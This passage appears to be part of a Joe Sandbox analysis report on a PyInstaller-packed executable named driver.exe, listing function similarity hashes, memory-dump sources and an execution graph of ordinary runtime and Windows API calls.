                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction ID: 43608e3a7d71fbba694d0bce4705e405c754ceeee61d327d24f3a54586d0a28a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57219F62B09B4186E6109B66F4447EA63A4FB88B88F400136EE8D9365BDE7CE645D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction ID: cfa19f61f0802f777e62fdf0d77e5a8d80f18a55cbfcfb7aa0afd87f2970415e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7D10672B19A818EE710CF66D4442AC3BB1FB44F9CB448235DE5E97B9ADE78E006D340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction ID: 0ade7742cb1139ad6edad806c389d333ff31c7ee319d8aa32b82e6c29b3de311
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A51E672F4A2118BFB18CF65D9516BC27A1AB00F9CF50413AEE1DD2AE6DF78B4019700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction ID: 34345da926f105f09844a299d8685bc2fc463766ad38cf1b0ea008df153402ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B517C22E4A6418AFB14DFB2D4503BD23B1BB48F9DF548435DE4DA768ADFB8E441A700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction ID: 6ffdb0cf0d0221358e9fe882391256db85e4156b394c2f554441733715bd3c2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5110821F4D14282F654876BE5442BA5292EF98F88F888030DB4D87B8FCDBDE4C1B200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                • Instruction ID: 8f0ca59b1b4c8bdb8dcc6cf619dedc6a632142d022b155d49dff1be3c8e0507e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD413912A4A28247FB249B27D44137A66E0EF90FACF144235EE5C86AD7DFBCD441E700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C90B6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A29BCC15), ref: 00007FF6A29C90D4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-2459203064
                                                                                                                                                                                                                                                • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                • Instruction ID: 9db338936b69dce85dddd4cdc65443c6794ef8bd36d3b9f2a2aabfeef0e3c6fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E41A032A4AB428AF758DF27E5811BD6794EF49FD8B454035E94E83B86CEBCF4819300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction ID: 5f470999ecf937b06abc2f2cdefb3448ada16cd907757714173054491b27a582
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4841C732B19A4185DB208F26E4443AA6BA0FB98F98F444035EE4DC7B99DF7CE401D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                • Instruction ID: a416c895f446f28496a71d9840456b4e57741596a3721b176f5b637dddf89f80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321E432A4928586FB24AB12D05426D73B1FB84F8CF954036DA8D83696DFFCE9459B40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction ID: 35c87853e0add64c2fb32127df40c301b7cb301cf980b52a70198180d7b8e47e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27115E32609B8182EB208F16F44026977E1FB88F88F584234EB8D87B56DF7CD5519B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction ID: 8c670cf2ca3cfcf05c6d961dac0df574b98f2fd56279d5e767f6498557b10572
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F018422A5E20786F7209F62986627E27E0EF44F0CF801035D94DC6A97DFACE504AA14

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:3%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:1%
                                                                                                                                                                                                                                                Total number of Nodes:1050
                                                                                                                                                                                                                                                Total number of Limit Nodes:91
                                                                                                                                                                                                                                                execution_graph 92252 7ff6a29b2fe0 92253 7ff6a29b2ff0 92252->92253 92254 7ff6a29b3041 92253->92254 92255 7ff6a29b302b 92253->92255 92257 7ff6a29b3061 92254->92257 92268 7ff6a29b3077 __vcrt_freefls 92254->92268 92314 7ff6a29b2710 54 API calls _log10_special 92255->92314 92315 7ff6a29b2710 54 API calls _log10_special 92257->92315 92260 7ff6a29b3037 __vcrt_freefls 92316 7ff6a29bc5c0 92260->92316 92263 7ff6a29b3349 92331 7ff6a29b2710 54 API calls _log10_special 92263->92331 92266 7ff6a29b3333 92330 7ff6a29b2710 54 API calls _log10_special 92266->92330 92268->92260 92268->92263 92268->92266 92269 7ff6a29b330d 92268->92269 92271 7ff6a29b3207 92268->92271 92280 7ff6a29b1470 92268->92280 92310 7ff6a29b1c80 92268->92310 92329 7ff6a29b2710 54 API calls _log10_special 92269->92329 92273 7ff6a29b3273 92271->92273 92325 7ff6a29ca474 37 API calls 2 library calls 92271->92325 92274 7ff6a29b3290 92273->92274 92275 7ff6a29b329e 92273->92275 92326 7ff6a29ca474 37 API calls 2 library calls 92274->92326 92327 7ff6a29b2dd0 37 API calls 92275->92327 92278 7ff6a29b329c 92328 7ff6a29b2500 54 API calls __vcrt_freefls 92278->92328 92332 7ff6a29b45b0 92280->92332 92283 7ff6a29b14bc 92342 7ff6a29c0744 92283->92342 92284 7ff6a29b149b 92372 7ff6a29b2710 54 API calls _log10_special 92284->92372 92287 7ff6a29b14ab 92287->92268 92288 7ff6a29b14d1 92289 7ff6a29b14d5 92288->92289 92290 7ff6a29b14f8 92288->92290 92373 7ff6a29c4f78 11 API calls _set_fmode 92289->92373 92294 7ff6a29b1532 92290->92294 92295 7ff6a29b1508 92290->92295 92292 7ff6a29b14da 92374 7ff6a29b2910 54 API calls _log10_special 92292->92374 92297 7ff6a29b1538 92294->92297 92305 7ff6a29b154b 92294->92305 92375 7ff6a29c4f78 11 API calls _set_fmode 92295->92375 92346 7ff6a29b1210 92297->92346 92298 7ff6a29b1510 92376 7ff6a29b2910 54 API calls _log10_special 92298->92376 92302 7ff6a29b14f3 __vcrt_freefls 92368 7ff6a29c00bc 92302->92368 92303 7ff6a29b15c4 92303->92268 92305->92302 92306 7ff6a29b15d6 92305->92306 92377 7ff6a29c040c 92305->92377 92380 7ff6a29c4f78 11 API calls _set_fmode 92306->92380 92308 7ff6a29b15db 92381 7ff6a29b2910 54 API calls _log10_special 92308->92381 92311 7ff6a29b1ca5 92310->92311 92625 7ff6a29c49f4 92311->92625 92314->92260 92315->92260 92317 7ff6a29bc5c9 92316->92317 92318 7ff6a29b31fa 92317->92318 92319 7ff6a29bc950 IsProcessorFeaturePresent 92317->92319 92320 7ff6a29bc968 92319->92320 92652 7ff6a29bcb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92320->92652 92322 7ff6a29bc97b 92653 7ff6a29bc910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92322->92653 92325->92273 92326->92278 92327->92278 92328->92260 92329->92260 92330->92260 92331->92260 92333 7ff6a29b45bc 92332->92333 92382 7ff6a29b9400 92333->92382 92335 7ff6a29b45e4 92336 7ff6a29b9400 2 API calls 92335->92336 92337 7ff6a29b45f7 92336->92337 92387 7ff6a29c6004 92337->92387 92340 7ff6a29bc5c0 _log10_special 8 API calls 92341 7ff6a29b1493 92340->92341 92341->92283 92341->92284 92343 7ff6a29c0774 92342->92343 92558 7ff6a29c04d4 92343->92558 92345 7ff6a29c078d 92345->92288 92347 7ff6a29b1268 92346->92347 92348 7ff6a29b126f 92347->92348 92349 7ff6a29b1297 92347->92349 92575 7ff6a29b2710 54 API calls _log10_special 92348->92575 92352 7ff6a29b12b1 92349->92352 92353 7ff6a29b12d4 92349->92353 92351 7ff6a29b1282 92351->92302 92576 7ff6a29c4f78 11 API calls _set_fmode 92352->92576 92357 7ff6a29b12e6 92353->92357 92366 7ff6a29b1309 memcpy_s 92353->92366 92355 7ff6a29b12b6 92577 7ff6a29b2910 54 API calls _log10_special 92355->92577 92578 7ff6a29c4f78 11 API calls _set_fmode 92357->92578 92359 7ff6a29b12eb 92579 7ff6a29b2910 54 API calls _log10_special 92359->92579 92360 7ff6a29c040c _fread_nolock 53 API calls 92360->92366 92362 7ff6a29b12cf __vcrt_freefls 92362->92302 92363 7ff6a29b13cf 92580 7ff6a29b2710 54 API calls _log10_special 92363->92580 92366->92360 92366->92362 92366->92363 92367 7ff6a29c0180 37 API calls 92366->92367 92571 7ff6a29c0b4c 92366->92571 92367->92366 92369 7ff6a29c00ec 92368->92369 92597 7ff6a29bfe98 92369->92597 92371 7ff6a29c0105 92371->92303 92372->92287 92373->92292 92374->92302 92375->92298 92376->92302 92609 7ff6a29c042c 92377->92609 92380->92308 92381->92302 92383 7ff6a29b9422 MultiByteToWideChar 92382->92383 92384 7ff6a29b9446 92382->92384 92383->92384 92386 7ff6a29b945c __vcrt_freefls 92383->92386 92385 7ff6a29b9463 MultiByteToWideChar 92384->92385 92384->92386 92385->92386 92386->92335 92388 7ff6a29c5f38 92387->92388 92389 7ff6a29c5f5e 92388->92389 92391 7ff6a29c5f91 92388->92391 92418 7ff6a29c4f78 11 API calls _set_fmode 92389->92418 92393 7ff6a29c5fa4 92391->92393 92394 7ff6a29c5f97 92391->92394 92392 7ff6a29c5f63 92419 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92392->92419 92406 7ff6a29cac98 92393->92406 92420 7ff6a29c4f78 11 API calls _set_fmode 92394->92420 92398 7ff6a29b4606 92398->92340 92400 7ff6a29c5fc5 92413 7ff6a29cff3c 92400->92413 92401 7ff6a29c5fb8 92421 7ff6a29c4f78 11 API calls _set_fmode 92401->92421 92404 7ff6a29c5fd8 92422 7ff6a29c54e8 LeaveCriticalSection 92404->92422 92423 7ff6a29d0348 EnterCriticalSection 92406->92423 92408 7ff6a29cacaf 92409 7ff6a29cad0c 19 API calls 92408->92409 92410 7ff6a29cacba 92409->92410 92411 7ff6a29d03a8 _isindst LeaveCriticalSection 92410->92411 92412 7ff6a29c5fae 92411->92412 92412->92400 92412->92401 92424 7ff6a29cfc38 92413->92424 92417 7ff6a29cff96 92417->92404 92418->92392 92419->92398 92420->92398 92421->92398 92429 7ff6a29cfc73 __vcrt_InitializeCriticalSectionEx 92424->92429 92426 7ff6a29cff11 92443 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92426->92443 92428 7ff6a29cfe43 92428->92417 92436 7ff6a29d6dc4 92428->92436 92429->92429 92435 7ff6a29cfe3a 92429->92435 92439 7ff6a29c7aac 51 API calls 3 library calls 92429->92439 92431 7ff6a29cfea5 92431->92435 92440 7ff6a29c7aac 51 API calls 3 library calls 92431->92440 92433 7ff6a29cfec4 92433->92435 92441 7ff6a29c7aac 51 API calls 3 library calls 92433->92441 92435->92428 92442 7ff6a29c4f78 11 API calls _set_fmode 92435->92442 92444 7ff6a29d63c4 92436->92444 92439->92431 92440->92433 92441->92435 92442->92426 92443->92428 92445 7ff6a29d63db 92444->92445 92446 7ff6a29d63f9 92444->92446 92498 7ff6a29c4f78 11 API calls _set_fmode 92445->92498 92446->92445 92449 7ff6a29d6415 92446->92449 92448 7ff6a29d63e0 92499 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92448->92499 92455 7ff6a29d69d4 92449->92455 92452 7ff6a29d63ec 92452->92417 92501 7ff6a29d6708 92455->92501 92458 7ff6a29d6a61 92520 7ff6a29c8590 92458->92520 92459 7ff6a29d6a49 92532 7ff6a29c4f58 11 API calls _set_fmode 92459->92532 92463 7ff6a29d6a4e 92533 7ff6a29c4f78 11 API calls _set_fmode 92463->92533 92491 7ff6a29d6440 92491->92452 92500 7ff6a29c8568 LeaveCriticalSection 92491->92500 92498->92448 92499->92452 92502 7ff6a29d6734 92501->92502 92508 7ff6a29d674e 92501->92508 92502->92508 92545 7ff6a29c4f78 11 API calls _set_fmode 92502->92545 92504 7ff6a29d6743 92546 7ff6a29ca950 37 API calls _invalid_parameter_noinfo 92504->92546 92506 7ff6a29d67cc 92507 7ff6a29d681d 92506->92507 92549 7ff6a29c4f78 11 API calls _set_fmode 92506->92549 92519 7ff6a29d687a 